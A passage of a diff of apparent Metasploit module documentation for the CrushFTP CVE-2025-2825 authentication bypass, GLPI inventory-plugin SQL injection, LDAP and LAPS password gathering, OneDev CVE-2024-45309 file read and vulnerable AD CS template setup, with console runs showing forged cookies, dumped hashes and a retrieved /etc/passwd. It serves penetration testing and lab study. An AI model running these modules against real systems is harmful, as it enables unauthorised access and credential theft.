+output working session cookies for the target user account. This vulnerability is tracked as CVE-2025-2825.
+More information can be found in the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis).
+
+## Options
+
+### TARGETUSER
+The target account to forge a session cookie for (default: crushadmin).
+
+## Testing
+To set up a test environment:
+1. Download a vulnerable 11.3.0 'CrushFTP.jar' file (SHA256: 6fbca7826d967bc56effb376743ff7921df907c576da74252844db9aeb0385a4).
+2. Configure `CRUSH_DIR` in `crushftp_init.sh` to point to the correct install directory.
+3. Execute `java -jar CrushFTP.jar` to show a local client GUI interface that can be used to set up an admin account.
+4. Execute `sudo crushftp_init.sh start` to launch the software on Linux or Mac. If on Windows, run `CrushFTP.exe` as an administrator.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/crushftp_authbypass_cve_2025_2825`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETUSER <TARGET_USER>`
+7. `run`
+
+## Scenarios
+### CrushFTP on Windows, Linux, or Mac
+```
+msf6 > use auxiliary/gather/crushftp_authbypass_cve_2025_2825
+msf6 auxiliary(gather/crushftp_authbypass_cve_2025_2825) > set RHOSTS 192.168.181.129
+RHOSTS => 192.168.181.129
+msf6 auxiliary(gather/crushftp_authbypass_cve_2025_2825) > set RPORT 8080
+RPORT => 8080
+msf6 auxiliary(gather/crushftp_authbypass_cve_2025_2825) > set TARGETUSER crushadmin
+TARGETUSER => crushadmin
+msf6 auxiliary(gather/crushftp_authbypass_cve_2025_2825) > show options
+
+Module options (auxiliary/gather/crushftp_authbypass_cve_2025_2825):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.181.129  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       8080             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /                yes       The URI path to CrushFTP
+   TARGETUSER  crushadmin       yes       The target account to forge a session cookie for
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/crushftp_authbypass_cve_2025_2825) > run
+[*] Running module against 192.168.181.129
+
+[*] Confirming the target is a CrushFTP web service
+[*] Attempting to bypass authentication
+[+] The target returned the expected empty response and is likely vulnerable
+[*] Attempting to access an authenticated API endpoint with the malicious session cookie
+[+] Authentication bypass succeeded! Cookie string generated
+Cookie: CrushAuth=1743641873_PrrQtXKr3iuXBCqQIPcIbfx20w5uW3; currentAuth=5uW3
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,154 @@
+## Vulnerable Application
+GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a `SimpleXMLElement`
+(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
+As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
+data from the backend database such as usernames and password hashes.
+
+In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the "Enable Inventory"
+radio button inside the administration configuration also must be checked.
+
+### Setup on Ubuntu 22.04
+
+Install PHP dependencies:
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt install apache2 php8.3 php8.3-curl php8.3-zip php8.3-gd php8.3-intl \
+ php8.3-intl php-pear php8.3-imagick php-bz2 php8.3-imap php-memcache php8.3-pspell   \
+ php8.3-tidy php8.3-xmlrpc php8.3-xsl php8.3-mbstring php8.3-ldap php-cas php-apcu    \
+ libapache2-mod-php8.3 php8.3-mysql mariadb-server
+```
+
+Ensure mariadb and apache are installed and running:
+```
+sudo systemctl status apache2
+sudo systemctl status mariadb
+```
+
+Run the mysql secure installation script, input defaults and your desired username password:
+```
+sudo mysql_secure_installation
+```
+
+Connect to the database:
+```
+sudo mysql -u root -p
+```
+
+Create a database user `msfuser` and a database named `glpi`:
+```
+CREATE USER 'msfuser'@'localhost' IDENTIFIED BY 'notpassword';
+CREATE DATABASE glpi;
+GRANT ALL PRIVILEGES ON glpi.* TO 'msfuser'@'localhost';
+FLUSH PRIVILEGES;
+EXIT;
+```
+
+Download the vulnerable version of GLPI, extract it and move it to `/var/www/html`:
+```
+wget https://github.com/glpi-project/glpi/releases/download/10.0.17/glpi-10.0.17.tgz
+tar -xvf glpi-10.0.17.tgz
+sudo mv glpi /var/www/html/
+```
+
+Download the vulnerable inventory plugin:
+```
+cd /var/www/html/glpi/plugins
+sudo wget https://github.com/glpi-project/glpi-inventory-plugin/releases/download/1.4.0/glpi-glpiinventory-1.4.0.tar.bz2
+sudo tar -xvjf glpi-glpiinventory-1.4.0.tar.bz2
+```
+
+Set the necessary permissions:
+```
+sudo chmod 755 -R /var/www/html/
+sudo chown www-data:www-data -R /var/www/html/
+```
+
+Edit sites-available:
+```
+sudo vim /etc/apache2/sites-available/glpi.conf
+```
+
+Paste:
+```
+<VirtualHost *:80>
+   ServerAdmin admin@your_domain.com
+   DocumentRoot /var/www/html/glpi
+   ServerName your-domain.com
+
+   <Directory /var/www/html/glpi>
+        Options FollowSymlinks
+        AllowOverride All
+        Require all granted
+   </Directory>
+
+   ErrorLog ${APACHE_LOG_DIR}/your-domain.com_error.log
+   CustomLog ${APACHE_LOG_DIR}/your-domain.com_access.log combined
+
+</VirtualHost>
+```
+
+Create the following symlink, rewrite and restart:
+```
+sudo ln -s /etc/apache2/sites-available/glpi.conf /etc/apache2/sites-enabled/glpi.conf
+sudo a2enmod rewrite
+sudo systemctl restart apache2
+```
+
+The application should be now available at `http://127.0.0.1/glpi`, navigate there in a browser to complete the setup wizard.
+Warnings in the `Checking of the compatibility of your environment with the execution of GLPI` can be ignored, click continue.
+It will ask you for the database credentials created above, input them and select the `glpi` database created above.
+
+Once complete you'll be brought to a login page, authenticate using the default credentials `glpi`/`glpi`.
+
+On the left hand side select and expand `Administration` in the dropdown select `Inventory`.
+On the right hand side select `Enable Inventory`, then `Save` at the bottom.
+
+On the left hand side select and expand `Setup` in the dropdown select `Plugins`.
+Near the bottom of the screen find the `GLPI Inventory` plugin and under `Actions` click the install button (Folder icon with `+` symbol).
+After installing the plugin a pop up will appear in the bottom right and ask if you want to enable the plugin, enable it.
+
+Now the application should be vulnerable.
+
+## Options
+
+### DB_COLUMNS
+The number of columns in the database. Can vary between versions, adjust this if exploit does not work initially.
+
+### MAX_ENTRIES
+The maximum  number of entries to dump from the database. More entries will increase module runtime.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Do: `use gather/glpi_inventory_plugin_unauth_sqli`.
+1. Set the `RHOST`.
+1. Set `MAX_ENTRIES` to `1` to speed up module run time for verification.
+1. Run the module.
+1. Receive a table with one username and it's corresponding password hash.
+
+## Scenarios
+### GLPI 10.0.17 running on Ubuntu 22.04
+```
+msf6 > use gather/glpi_inventory_plugin_unauth_sqli
+msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit 
+[*] Reloading module...
+[*] Running module against 172.16.199.130
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+glpi_users
+==========
+
+ name                   password                                                     api_token
+ ----                   --------                                                     ---------
+ Plugin_GLPI_Inventory  39
+ glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
+ glpi-system
+ normal                 $2y$10$iaxy0646EhwsuBbjAgme4uJN6SN.pbyK.ciTCnep67Wq8x.qt1JvS
+ post-only              $2y$10$//Ca44JjRIV/9Hv1IEM1y.v1aEa3FwzytX4QYtKsxyqF/rnOzROei
+ tech                   $2y$10$KjaOxGSyd0CMifvDVNiggOxCVHP0g8jER/jLtZsmF54S63LH5GWIy
+
+[*] Auxiliary module execution completed
+```
@@ -79,6 +79,58 @@ a normal user account by analyzing the objects in LDAP.
 1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
 1. The certificate should now be available to be issued by the CA server.

+### Setting up a ESC4 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC4-Template`, then click `Apply`.
+1. Go to the `Security` tab.
+1. Under `Groups or usernames` select `Authenticated Users`
+1. Under `Permissions for Authenticated Users` select `Write` -> `Allow`.
+1. Click `Apply` and then click `OK` to issue the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC13 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC13`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Issuance Policies entry, click the `Add` button, click the `New...` button.
+1. Name the new issuance policy `ESC13-Issuance-Policy`.
+4. Copy the Object Identifier as this will be needed later (ex: 11.3.6.1.4.1.311.21.8.12682474.6065318.6963902.6406785.3291287.83.1172775.12545198`).
+1. Leave the CPS location field blank.
+1. Click `Apply`.
+1. Open Active Directory Users and Computers, expand the domain on the left hand side.
+1. Right click `Users` and navigate to New -> Group.
+1. Enter `ESC13-Group` for the Group Name.
+1. Select `Universal` for Group scope and `Security` for Group type.
+1. Click `Apply`.
+1. Open ADSI Edit.
+1. In the left hand side right click `ADSI Edit` and select `Connect to...`.
+1. Under `Select a well known naming context` select `Default naming context`.
+1. Select the newly established connection, select the domain, select `CN=User`.
+1. On the right hand side find the recently created security group `CN=ESC13-Group`, right click select properties.
+1. Copy the value of the `distinguishedName` attribute, save this as we'll need it later.
+1. Back on the left hand side establish another connection, right click `ADSI Edit` and select `Connect to...`.
+1. This time under `Select a well known naming context` select `Configuration`.
+1. Select the newly established connection, select the domain, select `CN=Services` -> `CN=Public Key Services` -> `CN=OID`.
+1. In the right hand side find the object that corresponds to the Object Identifier saved earlier.
+1. The OID saved earlier ended in `12545198`, the object on the right will start with `CN=12545198.` followed by 34 hex characters. ex: `CN=12545198.7BCA239924D9515E63EA6B6F00748837`).
+1. Once located right click -> properties, select `msDS-OIDToGroupLink`.
+1. Paste the `distingushedName` of the security group saved above (ex: `CN=ESC13-Group,CN=Users,DC=demo,DC=lab`).
+1. Click `Apply`.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC13-Template` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC15 Vulnerable Certificate Template
+1. ESC15 depends on the schema version of the template being version 1 - which can no longer be created so we will edit an existing template that is schema version 1.
+1. Right click the `WebServer` template, select properties.
+1. Go to the Security Tab.
+1. Under `Groups or usernames` select `Authenticated Users`.
+1. Under `Permissions for Authenticated Users` select `Enroll` -> `Allow`.
+1. Click Apply.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder and ensure `WebServer` is listed, if it's not, add it.
+1. The certificate should now be available to be issued by the CA server.
+
 ## Module usage

 1. Do: Start msfconsole
@@ -1,204 +0,0 @@
-## Vulnerable Application
-
-### Description
-
-This module uses an LDAP connection to dump data from LDAP server
-using an anonymous or authenticated bind.
-Searching for specific attributes it collects user credentials.
-
-### Setup
-
-Tested in the wild.
-
-You may eventually setup an intentionally insecure OpenLDAP server in docker.
-The below OpenLDAP server does not have any ACL, therefore the hashPassword
-attributes are readable by anonymous clients.
-
-```
-$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
-$ cd bitnami-docker-openldap
-$ docker-compose up -d
-Creating bitnami-docker-openldap_openldap_1 ... done
-
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
-RHOSTS => 127.0.0.1
-msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
-RPORT => 1389
-msf5 auxiliary(gather/ldap_hashdump) > options
-
-Module options (auxiliary/gather/ldap_hashdump):
-
-   Name          Current Setting                                        Required  Description
-   ----          ---------------                                        --------  -----------
-   BASE_DN                                                              no        LDAP base DN if you already have it]
-   DOMAIN                                                               no        The domain to authenticate to
-   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
-   PASSWORD                                                             no        The password to authenticate with
-   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
-                 serpassword, password, pwdhistory, passwordhistory, c
-                 learpassword
-   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
-   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
-                                                                                  tml
-   RPORT         1389                                                   yes       The target port
-   SSL           true                                                   no        Enable SSL on the LDAP connection
-   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
-   USERNAME                                                             no        The username to authenticate with
-   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username
-
-                                                                                                                                                                                           Auxiliary action:
-   Name  Description
-   ----  -----------
-   Dump  Dump all LDAP data
-
-
-msf5 auxiliary(gather/ldap_hashdump) >
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against 127.0.0.1
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=example,dc=org
-[*] Dumping LDAP data from server at 127.0.0.1:1389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
-[*] Searching for attribute: userPassword
-[*] Taking dn attribute as username
-[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
-[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) >
-
-```
-
-## Verification Steps
-
-Follow [Setup](#setup) and [Scenarios](#scenarios).
-
-## Actions
-
-### Dump
-
-Dump all LDAP data from the LDAP server.
-
-## Options
-
-### BASE_DN
-
-If you already have the LDAP base DN, you may set it in this option.
-
-### USER_ATTR
-
-LDAP attribute to take the user name from. Defaults to DN, however you may
-wish to change it UID, name or similar.
-
-### PASS_ATTR
-
-LDAP attribute to take the password hash from. Defaults to userPassword,
-some LDAP server may use different attribute, e.g. unixUserPassword,
-sambantpassword, sambalmpassword.
-
-## Scenarios
-
-### Avaya Communication Manager via anonymous bind
-
-```
-msf5 > use auxiliary/gather/ldap_hashdump
-msf5 auxiliary(gather/ldap_hashdump) > options
-
-Module options (auxiliary/gather/ldap_hashdump):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      389              yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
-
-   Name  Description
-   ----  -----------
-   Dump  Dump all LDAP data
-
-
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
-RHOSTS => [redacted_ip_address]
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=vsp
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
-[*] Searching for attribute: userPassword
-[*] Taking dn attribute as username
-[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
-USER_ATTR => uid
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=vsp
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
-[*] Searching for attribute: userPassword
-[*] Taking uid attribute as username
-[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) >
-```
-
-### NASDeluxe - NAS with Samba LM/NTLM hashes
-
-```
-msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
-USER_ATTR => uid
-msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
-PASS_ATTR => sambantpassword
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
-RHOSTS => [redacted_ip_address]
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=server,dc=nas
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
-[*] Searching for attribute: sambantpassword
-[*] Taking uid attribute as username
-[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
-[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
-[*] Auxiliary module execution completed
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=server,dc=nas
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
-[*] Searching for attribute: sambalmpassword
-[*] Taking uid attribute as username
-[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
-[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
-[*] Auxiliary module execution completed
-```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module will gather passwords and password hashes from a target LDAP server via multiple techniques including
+Windows LAPS.
+
+### Setup (OpenLDAP via Docker)
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+```
+
+```
+msf6 auxiliary(gather/ldap_passwords) > rerun ldap://:@127.0.0.1:1389
+[*] Reloading module...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovered base DN: dc=example,dc=org
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=example,dc=org
+[+] Credentials (password) found in userpassword: user01:password1
+[+] Credentials (password) found in userpassword: user02:password2
+[*] Found 2 entries and 2 credentials in 'dc=example,dc=org'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_passwords) >
+```
+
+### Setup (Windows LAPSv1)
+1. Start with a Windows Domain Controller
+2. Install all the programs from the applicable binary from https://www.microsoft.com/en-us/download/details.aspx?id=46899
+3. Make sure the user account is a Schema Admin, reboot after joining the group
+4. Set the Group Policy settings as noted in Section 3 of the “LAPS_OperationsGuide.docx” file
+5. Run the UI as noted in Section 4, the LDAP attributes should be populated at this point
+
+### Setup (Windows LAPSv2)
+1. Start with a Windows Domain Controller that has the April 2023 security update installed
+2. Follow the instructions from https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-scenarios-windows-server-active-directory
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to that contains the username. Defaults to the first attribute that exists in the search order
+`sAMAccountName` (Active Directory), `uid` (OpenLDAP), `dn`.
+
+### PASS_ATTR
+
+LDAP attribute to take the password data from. This option will be added to the array of options the module always
+searches for.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf6 auxiliary(gather/ldap_passwords) > options
+
+Module options (auxiliary/gather/ldap_passwords):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   PASS_ATTR     userPassword     no        Additional LDAP attribute(s) that contain password hashes
+   READ_TIMEOUT  600              no        LDAP read timeout in seconds
+   SSL           false            no        Enable SSL on the LDAP connection
+   USER_ATTR                      no        LDAP attribute(s), that contains username
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         389              no        The target port
+   THREADS       1                yes       The number of concurrent threads (max one per host)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1
+RHOSTS => 192.0.2.1
+
+msf6 auxiliary(gather/ldap_passwords) > run
+[*] Discovered base DN: dc=vsp
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=vsp
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Found 2 entries and 2 credentials in 'dc=vsp'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf6 auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1
+RHOSTS => 192.0.2.1
+
+msf5 auxiliary(gather/ldap_passwords) > run
+[*] Running module against 192.0.2.1
+
+[*] Discovered base DN: dc=server,dc=nas
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=server,dc=nas
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Found 2 entries and 2 credentials in 'dc=server,dc=nas'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Windows Server 2019 - LAPSv2 with Encryption
+```
+msf6 auxiliary(gather/ldap_passwords) > run ldap://msflab.local;smcintyre:Password1!@192.0.2.10
+[*] Discovered base DN: DC=msflab,DC=local
+[*] The target LDAP server is an Active Directory Domain Controller.
+[*] Searching base DN: DC=msflab,DC=local
+[+] Credentials (password) found in mslaps-encryptedpassword: Administrator:m8L3A.LcZ9!lnT (expires: 2025-03-08 17:22:57 UTC)
+[*] Found 1 entries and 1 credentials in 'DC=msflab,DC=local'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_passwords) >
+```
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+OneDev is a Git Server with CI/CD, kanban, and packages.
+This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8.
+This vulnerability arises due to the lack of user-input sanitization of path traversal sequences `..` in the `ProjectBlobPage.java` file.
+
+To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor
+can view existing projects without authentication.
+However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach.
+By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
+
+## Installation
+
+OneDev provides docker images for a quick setup process.
+A vulnerable version (`v11.0.8`) can be found [here](https://hub.docker.com/r/1dev/server/tags?name=11.0.8).
+
+Installation instructions can be found [here](https://docs.onedev.io/).
+
+## Verification Steps
+
+1. Install the OneDev application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/onedev_arbitrary_file_read`
+4. Set the `RHOSTS` and `RPORT` options as necessary
+5. Set the `TARGETFILE` option with the absolute path of the target file to read
+
+If a valid project name is known:
+
+6. Set the `PROJECT_NAME` option with the known project name
+7. Do: `run`
+8. If the file exists, the contents will be displayed to the user
+
+If there is no information about existing projects:
+
+6. Set the `PROJECT_NAMES_FILE` option with the absolute path of a wordlist that contains multiple possible values for a valid project name
+7. Do: `run`
+8. If a valid project name is found, the target file contents will be displayed to the user
+
+## Options
+
+### PROJECT_NAME
+A valid OneDev project name is required to exploit the vulnerability. If anonymous access is enabled on the OneDev server,
+any visitor can see the existing projects, and collect a valid project name. On the other hand, if anonymous access is disabled,
+the user needs to have previous knowledge of a valid project name or use the `PROJECT_NAMES_FILE` option to find one through brute force.
+
+### PROJECT_NAMES_FILE
+Absolute path of a wordlist containing multiple possible values for valid project names. Once this option is set,
+the module will verify whether a given project exists for each word.
+
+
+### TARGETFILE
+Absolute file path of the target file to be retrieved from the OneDev server. Set as `/etc/passwd` by default.
+
+### STORE_LOOT
+If set as `true`, the target file contents will be stored as loot. Set as `false` by default.
+
+
+## Scenarios
+
+### Example: Known project name or anonymous access enabled on OneDev 11.0.8
+
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAME myproject
+PROJECT_NAME => myproject
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
+
+### Example: Unknown projects with anonymous access disabled on OneDev 11.0.8
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAMES_FILE /home/server/wordlist.txt
+PROJECT_NAMES_FILE => /home/server/wordlist.txt
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[*] Brute forcing valid project name ...
+[+] 192.168.1.10:6610 - Found valid OneDev project name: myproject
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
